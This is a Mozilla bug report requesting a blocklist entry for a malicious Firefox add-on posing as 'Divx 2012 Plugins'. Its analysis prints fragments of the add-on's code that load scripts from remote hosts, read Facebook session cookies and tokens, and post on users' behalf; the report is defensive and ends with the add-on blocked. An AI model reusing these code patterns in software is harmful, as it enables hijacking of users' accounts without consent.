Closed Bug 758503 Opened 13 years ago Closed 13 years ago

Malicious "Divx 2012" add-on

Categories

(Toolkit :: Blocklist Policy Requests, defect)

Product:
Toolkit
Component:
Blocklist Policy Requests
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED FIXED

People

(Reporter: mhammell, Assigned: jorgev)

Details

Attachments

(1 file)

20120524_malicious_plugin.zip (password malwares4mple)
39.23 KB, application/octet-stream
Details
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5 Steps to reproduce: Downloaded add-on from Actual results: Report for http://pluginstall.info/2012.xpi ** Embedded and Remote Files ** install.rdf chrome.manifest content/script-compiler.js content/youtube.js http://pluginstall.info/video/script.js http://plugin2012.info/you.js http://plugin2012.info/viral1.js http://plugin2012.info/ultra.js http://plugin2012.info/ultra2.js content/xmlhttprequester.js content/script-compiler-overlay.xul http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul content/skin/icon.png content/prefman.js ** Embedded Metadata ** <em:name>Divx 2012 Plugins</em:name> <em:version>9.4.2</em:version> <em:targetApplication> <em:minVersion>2.0</em:minVersion> <em:maxVersion>10.*</em:maxVersion> </em:targetApplication> <em:creator>Your Tube</em:creator> <em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL> <em:description>videos plugins</em:description> <em:homepageURL>http://youtube3ee.com/</em:homepageURL> <em:updateURL>http://brownizzeee.info/test/update.rdf</em:updateURL> ...<em:updateKey>MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCUtKPOGhnhlxo7vRoSR0YC1g/Mo... ** Files Loaded ** <em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL> ...overlay chrome://browser/content/browser.xul chrome://youtube/content/script-com... 'chrome://youtube/content/youtube.js' ...pt type='application/x-javascript' src='chrome://youtube/content/youtube.js'></s... ** Remote Javascript Loaded ** <Description about="urn:mozilla:install-manifest"> <Description> </Description> <em:description>videos plugins</em:description> </Description> ...nt/browser.xul chrome://youtube/content/script-compiler-overlay.xul var scriptableStream=Components .classes["@mozilla.org/scriptableinputstream;1"] .getService(Components.interfaces.nsIScriptableInputStream); .classes["@mozilla.org/intl/scriptableunicodeconverter"] .createInstance(Components.interfaces.nsIScriptableUnicodeConverter); scriptableStream.init(input); var str=scriptableStream.read(input.available()); scriptableStream.close(); var script=youtube_gmCompiler.getUrlContents( youtube_gmCompiler.injectScript(script, href, unsafeWin); injectScript: function(script, url, unsafeContentWin) { var sandbox, script, logger, storage, xmlhttpRequester; var storage=new youtube_ScriptStorage(); "(function(){"+script+"})()", e2.fileName=script.filename; function youtube_ScriptStorage() { youtube_ScriptStorage.prototype.setValue = function(name, val) { youtube_ScriptStorage.prototype.getValue = function(name, defVal) { loadScript_you(); function loadScript_you() { var s = document.createElement('script'); s.setAttribute("type","text/javascript"); s.setAttribute("src", "http://pluginstall.info/video/script.js"); function addScript() { var s = document.createElement('script'); s.setAttribute("type", "text/javascript"); s.setAttribute("src", "http://plugin2012.info/you.js"); function addScript(src) { var s = document.createElement('script'); s.setAttribute("type", "text/javascript"); var a = document.getElementsByTagName('script')[0]; addScript("http://plugin2012.info/viral1.js"); addScript("http://plugin2012.info/ultra.js"); addScript("http://plugin2012.info/ultra2.js"); var a = document.getElementsByTagName('script')[0]; addScript(); // this function gets called by user scripts in content security scope to ...eymaster/gatekeeper/there.is.only.xul'><script type='application/x-javascript' s... ** Facebook Paths Accessed ** blogs[0] = 'http://www.facebook.com/bra.toch?'; blogs[1] = 'http://www.facebook.com/bra.toch?'; ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) { ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) { ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) { ** Facebook Data Accessed ** var fb_dtsg = Env.fb_dtsg; user_id = readCookie('c_user'); ...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... var fb_dtsg = Env.fb_dtsg; ..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... user_id = readCookie('c_user'); var fb_dtsg = Env.fb_dtsg; user_id = readCookie('c_user'); ...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... var fb_dtsg = Env.fb_dtsg; ..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... user_id = readCookie('c_user'); var fb_dtsg = Env.fb_dtsg; user_id = readCookie('c_user'); ...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... var fb_dtsg = Env.fb_dtsg; ..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... user_id = readCookie('c_user'); ** HTTP Requests ** var c = new XMLHttpRequest(); ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... c['open']('POST', d, true); var c = new XMLHttpRequest(); c['open']('POST', d, true); var c = new XMLHttpRequest(); ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... c['open']('POST', d, true); var c = new XMLHttpRequest(); c['open']('POST', d, true); var c = new XMLHttpRequest(); ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... c['open']('POST', d, true); var c = new XMLHttpRequest(); c['open']('POST', d, true); var req = new this.chromeWindow.XMLHttpRequest(); ** All URLs Loaded or Mentioned ** <RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#"> <em:homepageURL>http://youtube3ee.com/</em:homepageURL> <em:updateURL>http://brownizzeee.info/test/update.rdf</em:updateURL> // http://www.letitblog.com/code/python/greasemonkey.py.txt // http://greasemonkey.devjavu.com/ change[i].src="http://faceredirects.blogspot.ca/?iframe"; ifra.src="http://faceredirects.blogspot.ca/?iframe" ...L='<iframe id="change" width="500" src="http://faceredirects.blogspot.ca/?iframe... blogs[0] = 'http://www.facebook.com/bra.toch?'; blogs[1] = 'http://www.facebook.com/bra.toch?'; ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; addScript("http://plugin2012.info/viral1.js"); blogs[0] = 'http://dl.dropbox.com/u/81406642/a.html?'; blogs[1] = 'http://dl.dropbox.com/u/81406642/a.html?'; ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; ... '<center><br><br><br><br><br><img src="http://i.imgur.com/4BDZc.gif" /><br />Pl... ...setTimeout('top.location=\'http://faceredirects.blogspot.ca/?security\';', 10000... addScript("http://plugin2012.info/ultra.js"); blogs[0] = 'http://dl.dropbox.com/u/81406642/b.html?'; blogs[1] = 'http://dl.dropbox.com/u/81406642/b.html?'; ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; ... '<center><br><br><br><br><br><img src="http://i.imgur.com/4BDZc.gif" /><br />Pl... ...setTimeout('top.location=\'http://faceredirects.blogspot.ca/?security\';', 10000... addScript("http://plugin2012.info/ultra2.js"); s.setAttribute("src", "http://plugin2012.info/you.js"); s.setAttribute("src", "http://pluginstall.info/video/script.js"); ...<dd><code>http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul</code></... ...<dd><a href="https://developer.mozilla.org/en/XUL">https://developer.mozilla.org/... ...<?xml version="1.0"?><overlay xmlns='http://www.mozilla.org/keymaster/gatekeeper... Expected results: It should not access your Facebook session tokens and cookies and then post messages on your behalf without your consent.
Id: youtubeee@youtuber3.com
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i96
Status: ASSIGNED → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
Product: addons.mozilla.org → Toolkit
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: